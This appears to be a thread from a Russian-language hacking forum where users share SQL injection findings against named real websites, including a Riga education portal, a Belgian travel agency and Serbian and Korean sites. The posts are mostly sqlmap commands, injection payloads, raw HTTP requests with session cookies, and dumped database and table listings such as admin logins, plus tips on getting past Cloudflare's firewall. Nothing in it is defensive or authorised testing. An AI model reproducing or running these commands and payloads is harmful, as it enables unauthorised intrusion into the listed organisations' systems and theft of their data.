• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Отслеживать
sqlmap -u "https://izglitiba.riga.lv/en/search?s=" --dbs --level 2 --risk 2 --threads=10 --technique=T --random-agent --time-sec=3

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: s=') AND (SELECT 1813 FROM (SELECT(SLEEP(5)))ePcx) AND ('jwsY'='jwsY


available databases [2]:
[*] iksd2017
[*] information_schema


iksd2017: малая часть
[01:40:34] [INFO] retrieved: accesskeys
[01:43:44] [INFO] retrieved: activeorders
[01:47:33] [INFO] retrieved: activeorders_seats
[01:51:15] [INFO] retrieved: adminnews
[01:54:54] [INFO] retrieved: athletes
[01:58:56] [INFO] retrieved: banners
[02:02:22] [INFO] retrieved: banners_slides
[02:07:33] [INFO] retrieved: bannerstogroups
[02:13:31] [INFO] retrieved: cited_rulings
[02:20:47] [INFO] retrieved: cited_rulings_to_law
[02:28:02] [INFO] retrieved: court_law
[02:33:11] [INFO] retrieved: court_law_laws
[02:37:47] [INFO] retrieved: court_law_laws_copy
[02:43:31] [INFO] retrieved: court_law_to_law
[02:49:14] [INFO] retrieved: cultureevents
[02:55:48] [INFO] retrieved: cultureevents_togroups
[03:03:51] [INFO] retrieved: cultureeventsfiles
[03:08:18] [INFO] retrieved: cultureeventsgroups
[03:13:02] [INFO] retrieved: cultureeventstogroups
[03:17:51] [INFO] retrieved: deliveryadress
[03:22:34] [INFO] retrieved: deliverytypes
[03:25:28] [INFO] retrieved: discounts
[03:28:33] [INFO] retrieved: educationevents
[03:33:53] [INFO] retrieved: educationevents_togroups
[03:39:39] [INFO] retrieved: educationeventsfiles
[03:43:00] [INFO] retrieved: educationeventsgroups
[03:47:05] [INFO] retrieved: educationseventstogroups
[03:54:00] [INFO] retrieved: etc_law_laws
[04:01:24] [INFO] retrieved: etc_law_lo_law
[04:07:40] [INFO] retrieved: etc_law_to_page
[04:20:47] [INFO] retrieved: etc_law_
[04:23:51] [INFO] retrieved: eventdates
 
Anton_Dyatlov сказал(а):
sqlmap -u "https://izglitiba.riga.lv/en/search?s=" --dbs --level 2 --risk 2 --threads=10 --technique=T --random-agent --time-sec=3

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: s=') AND (SELECT 1813 FROM (SELECT(SLEEP(5)))ePcx) AND ('jwsY'='jwsY


available databases [2]:
[*] iksd2017
[*] information_schema


iksd2017: малая часть
[01:40:34] [INFO] retrieved: accesskeys
[01:43:44] [INFO] retrieved: activeorders
[01:47:33] [INFO] retrieved: activeorders_seats
[01:51:15] [INFO] retrieved: adminnews
[01:54:54] [INFO] retrieved: athletes
[01:58:56] [INFO] retrieved: banners
[02:02:22] [INFO] retrieved: banners_slides
[02:07:33] [INFO] retrieved: bannerstogroups
[02:13:31] [INFO] retrieved: cited_rulings
[02:20:47] [INFO] retrieved: cited_rulings_to_law
[02:28:02] [INFO] retrieved: court_law
[02:33:11] [INFO] retrieved: court_law_laws
[02:37:47] [INFO] retrieved: court_law_laws_copy
[02:43:31] [INFO] retrieved: court_law_to_law
[02:49:14] [INFO] retrieved: cultureevents
[02:55:48] [INFO] retrieved: cultureevents_togroups
[03:03:51] [INFO] retrieved: cultureeventsfiles
[03:08:18] [INFO] retrieved: cultureeventsgroups
[03:13:02] [INFO] retrieved: cultureeventstogroups
[03:17:51] [INFO] retrieved: deliveryadress
[03:22:34] [INFO] retrieved: deliverytypes
[03:25:28] [INFO] retrieved: discounts
[03:28:33] [INFO] retrieved: educationevents
[03:33:53] [INFO] retrieved: educationevents_togroups
[03:39:39] [INFO] retrieved: educationeventsfiles
[03:43:00] [INFO] retrieved: educationeventsgroups
[03:47:05] [INFO] retrieved: educationseventstogroups
[03:54:00] [INFO] retrieved: etc_law_laws
[04:01:24] [INFO] retrieved: etc_law_lo_law
[04:07:40] [INFO] retrieved: etc_law_to_page
[04:20:47] [INFO] retrieved: etc_law_
[04:23:51] [INFO] retrieved: eventdates
дальше просто ждать устал?
 
Что можно с этим сделать? Пробовал и --no-cast и --hex, имя базы всё время абракадабра.
Количество баз тоже постоянно выдаёт рандомно, то 1-6, то миллион.
ps: WAF -Cloudflare, tamper =charencode, -v 3 ничего интересного не показывает
sqlmap_base.png
 
Последнее редактирование:
Hey.. need advice. Found a blind time based SQL injection. I'm able to retrieve hostname, banner, current database and current user. But not able to retrieve tables or data or check priveleges... The current user is administrator and yes it's protected by cloudflare... Even ghauri is facing the same problem...
 
rocknrollforever сказал(а):
Что можно с этим сделать? Пробовал и --no-cast и --hex, имя базы всё время абракадабра.
Количество баз тоже постоянно выдаёт рандомно, то 1-6, то миллион.
ps: WAF -Cloudflare, tamper =charencode, -v 3 ничего интересного не показывает
Посмотреть вложение 96184
так на скрине видно же что тебя вафка убила просто
 
Anton_Dyatlov сказал(а):
sqlmap -u "https://izglitiba.riga.lv/en/search?s=" --dbs --level 2 --risk 2 --threads=10 --technique=T --random-agent --time-sec=3

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: s=') AND (SELECT 1813 FROM (SELECT(SLEEP(5)))ePcx) AND ('jwsY'='jwsY


available databases [2]:
[*] iksd2017
[*] information_schema


iksd2017: малая часть
[01:40:34] [INFO] retrieved: accesskeys
[01:43:44] [INFO] retrieved: activeorders
[01:47:33] [INFO] retrieved: activeorders_seats
[01:51:15] [INFO] retrieved: adminnews
[01:54:54] [INFO] retrieved: athletes
[01:58:56] [INFO] retrieved: banners
[02:02:22] [INFO] retrieved: banners_slides
[02:07:33] [INFO] retrieved: bannerstogroups
[02:13:31] [INFO] retrieved: cited_rulings
[02:20:47] [INFO] retrieved: cited_rulings_to_law
[02:28:02] [INFO] retrieved: court_law
[02:33:11] [INFO] retrieved: court_law_laws
[02:37:47] [INFO] retrieved: court_law_laws_copy
[02:43:31] [INFO] retrieved: court_law_to_law
[02:49:14] [INFO] retrieved: cultureevents
[02:55:48] [INFO] retrieved: cultureevents_togroups
[03:03:51] [INFO] retrieved: cultureeventsfiles
[03:08:18] [INFO] retrieved: cultureeventsgroups
[03:13:02] [INFO] retrieved: cultureeventstogroups
[03:17:51] [INFO] retrieved: deliveryadress
[03:22:34] [INFO] retrieved: deliverytypes
[03:25:28] [INFO] retrieved: discounts
[03:28:33] [INFO] retrieved: educationevents
[03:33:53] [INFO] retrieved: educationevents_togroups
[03:39:39] [INFO] retrieved: educationeventsfiles
[03:43:00] [INFO] retrieved: educationeventsgroups
[03:47:05] [INFO] retrieved: educationseventstogroups
[03:54:00] [INFO] retrieved: etc_law_laws
[04:01:24] [INFO] retrieved: etc_law_lo_law
[04:07:40] [INFO] retrieved: etc_law_to_page
[04:20:47] [INFO] retrieved: etc_law_
[04:23:51] [INFO] retrieved: eventdates
sqlmap -u "https://izglitiba.riga.lv/en/search?s=" -p s --level 5 --risk 3 -v 3 --skip-waf --random-agent --code=200 --prefix="')" --dbms=mysql --suffix="AND ('jwsY'='jwsY" --dbs --tec=B
выкрутил в булин.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: s=') AND 4749=(SELECT (CASE WHEN (4749=4749) THEN 4749 ELSE (SELECT 6424 UNION SELECT 6440) END))AND ('jwsY'='jwsY
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
---


available databases [2]:
[*] iksd2017
[*] information_schema
 
sqlmap -u "https://groepsreizen.herbotsreizen.be/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c&previewID=x" --level=5 --risk=3 --random-agent --dbms=mysql --technique="BET" -p contenthistid -dbs
Код: 
[15:14:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18, ColdFusion
back-end DBMS: MySQL >= 5.0.0
current database: 'herbotsreizen-live-202104'
---
Parameter: contenthistid (GET)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: method=processAsyncObject&object=displayregion&contenthistid=x\'' AND GTID_SUBSET(CONCAT(0x717a626271,(SELECT (ELT(7370=7370,1))),0x716a7a6271),7370)-- xwYY&previewID=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: method=processAsyncObject&object=displayregion&contenthistid=x\'' AND (SELECT 6187 FROM (SELECT(SLEEP(5)))PZrH)-- xnEc&previewID=x
---
available databases [15]:
[*] herbotsreizen-crm
[*] herbotsreizen-klantenkaart
[*] herbotsreizen-live
[*] herbotsreizen-live-202104
[*] herbotsreizen_mura_2
[*] information_schema
[*] luceemuratest1
[*] mura-siat-group
[*] mura1
[*] mura2
[*] mysql
[*] paesmans-mura
[*] performance_schema
[*] sys
[*] webbitssystem
 
Код: 
POST /index.php?module_id=221&route=module/journal2_super_filter/filters HTTP/1.1
Referer: https://www.panthera-tuningshop.de/
Cookie: PHPSESSID=; language=de-DE; li_nr=1; res_pushed=1; currency=EUR; jrv=2886
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Content-Length: 125
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.panthera-tuningshop.de
Connection: Keep-alive

filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"&path=2138&route=product/category&search=&tag=

sqlmap -r ./sql_inj.txt --level=5 --risk=3 --random-agent --technique='TE' -p 'manufacturer_id' --dbms=mysql --dbs

---
Parameter: manufacturer_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"') AND (SELECT 1836 FROM(SELECT COUNT(*),CONCAT(0x71766b7a71,(SELECT (ELT(1836=1836,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Kbuo&path=2138&route=product/category&search=&tag=

Type: time-based blind
Title: MySQL > 5.0.12 AND time-based blind (heavy query)
Payload: filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"') AND 5580=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- cdPZ&path=2138&route=product/category&search=&tag=
---

[INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[INFO] fetching database names
available databases [2]:
[*] gahn3j_panthera
[*] information_schema
 
Код: 
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://www.axon.rs/view_product.asp?ItemID=192&gpcid=23&cid=237&scid=2373"
---
Parameter: ItemID (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ItemID=192 AND (SELECT 6061 FROM (SELECT(SLEEP(5)))wlgj)&gpcid=23&cid=237&scid=2373

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: ItemID=-9337 UNION ALL SELECT CONCAT(0x7170786b71,0x694971494b55436370495651626b616b695a63706c7362696d615a62445a4b65587456454f4a4370,0x7162626b71)-- -&gpcid=23&cid=237&scid=2373
---
web server operating system: Windows 10 or 2019 or 2016 or 11 or 2022
web application technology: Microsoft IIS 10.0, ASP, ASP.NET
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] axon
[*] information_schema
[INFO] fetching tables for databases: 'axon, information_schema'
Database: information_schema
[79 tables]
+---------------------------------------+
| ALL_PLUGINS                           |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
| CHECK_CONSTRAINTS                     |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| ENABLED_ROLES                         |
| FILES                                 |
| GEOMETRY_COLUMNS                      |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_METRICS                        |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESPACES                |
| INNODB_SYS_TABLESTATS                 |
| INNODB_SYS_VIRTUAL                    |
| INNODB_TABLESPACES_ENCRYPTION         |
| INNODB_TRX                            |
| KEYWORDS                              |
| KEY_CACHES                            |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| SPATIAL_REF_SYS                       |
| SQL_FUNCTIONS                         |
| STATISTICS                            |
| SYSTEM_VARIABLES                      |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| THREAD_POOL_GROUPS                    |
| THREAD_POOL_QUEUES                    |
| THREAD_POOL_STATS                     |
| THREAD_POOL_WAITS                     |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
| user_variables                        |
+---------------------------------------+
Database: axon
[33 tables]
+---------------------------------------+
| idgeneration                          |
| item_categories                       |
| item_files                            |
| members                               |
| news_categories                       |
| news_categories_rs                    |
| news_item_files                       |
| news_item_files_rs                    |
| news_main_categories                  |
| news_main_categories_rs               |
| news_subcategories                    |
| news_subcategories_rs                 |
| newsletter_archieve                   |
| newsletter_config                     |
| newsletter_mail_list                  |
| newsletter_templates                  |
| site_members                          |
| tblcatalog                            |
| tblcatalog2                           |
| tblcatalog_23_06_2015                 |
| tblcatalogcategory                    |
| tblcatalogsubcategory                 |
| tblcountries                          |
| tblfpa                                |
| tblgpc                                |
| tblitemsordered                       |
| tblmanufacturers                      |
| tblnm_news                            |
| tblnm_news_rs                         |
| tblorders                             |
| tblprefectures                        |
| tblregions                            |
| tblzones                              |
+---------------------------------------+
 
Код: 
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://osbranko.rs/Siteview.asp?ID=11"
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=11) AND 3939=3939 AND (4321=4321
---
[INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2019 or 11 or 10 or 2016 or 2022
web application technology: ASP, ASP.NET, Microsoft IIS 10.0
back-end DBMS: Microsoft Access
 
Код: 
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://www.kor.rs/registri_Preduzeca_detalj.asp?ID=100"
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=100 AND 1168=1168

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: ID=100 OR 1464=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
 
sqlmap.py -u "http://www.proficientindustries.in/view-single-news.php?id=[t]" --batch --threads=4 --tamper="xforwardedfor,charencode" --dbms=mysql --dbs

available databases [2]:
[*] information_schema
[*] nsp_proficientin

Database: nsp_proficientin
[15 tables]
+--------------------+
| admin_login |
| admin_users |
| bannerad_td |
| download_album |
| download_master_td |
| event_files_td |
| event_td |
| image_album |
| images_master_td |
| newsletter_td |
| send_email_td |
| short_news |
| video_album |
| videos_master_td |
| websiteinfo_master |
+--------------------+
 
Код: 
GET /league_tables_script/league_tables.php?role_type=-1'%20OR%203*2*1=6%20AND%20000599=000599%20--%20&section_type=value&transaction_type=33 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.vccedge.com/
Cookie: AKA_A2=A; PHPSESSID=0bbnl7n44bggmkb304ghgiso9l; zabHMBucket=5b960c73723b4fd98cdfe9986402b1c6; zabUserId=1734628069703zabu0.849318458794271; zft-sdc=isef%3Dtrue-isfr%3Dtrue-source%3Ddirect; zps-tgr-dts=sc%3D2-expAppOnNewSession%3D%5B%5D-pc%3D4-sesst%3D1734628339902; zscadbd831887624ea3817dfe5118b3c805=1734628339895zsc0.5480279344384416
Accept: */*
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.vccedge.com
Connection: Keep-alive

Код: 
python3 sqlmap.py -r request.txt -dbms=mysql --dbs

available databases [2]:
[*] information_schema
[*] live_appdb

448 Tables in total. Pasting them all would just take away too much space unnecessarily
 
Код: 
sqlmap.py -u "https://www.druginfo.co.kr/detail/drug_images/proxies/get_json.aspx?count=10&offset=0&ppMainCode=146431ASS&sortBy=proIDStr&sortDir=asc" -p ppMainCode --batch --level=5 --risk=3 --dbms=mssql --random-agent --batch --technique=S --dbs

Код: 
---
Parameter: ppMainCode (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: count=10&offset=0&ppMainCode=146431ASS';WAITFOR DELAY '0:0:5'--&sortBy=proIDStr&sortDir=asc
---
[18:04:35] [INFO] testing Microsoft SQL Server
[18:04:35] [INFO] confirming Microsoft SQL Server
[18:04:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 11 or 10 or 2019 or 2016 or 2022
web application technology: Microsoft IIS 10.0, ASP.NET 2.0.50727, ASP.NET
back-end DBMS: Microsoft SQL Server 2016
посещалка вроде ебанутая, но мне лень крутить сткакед
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх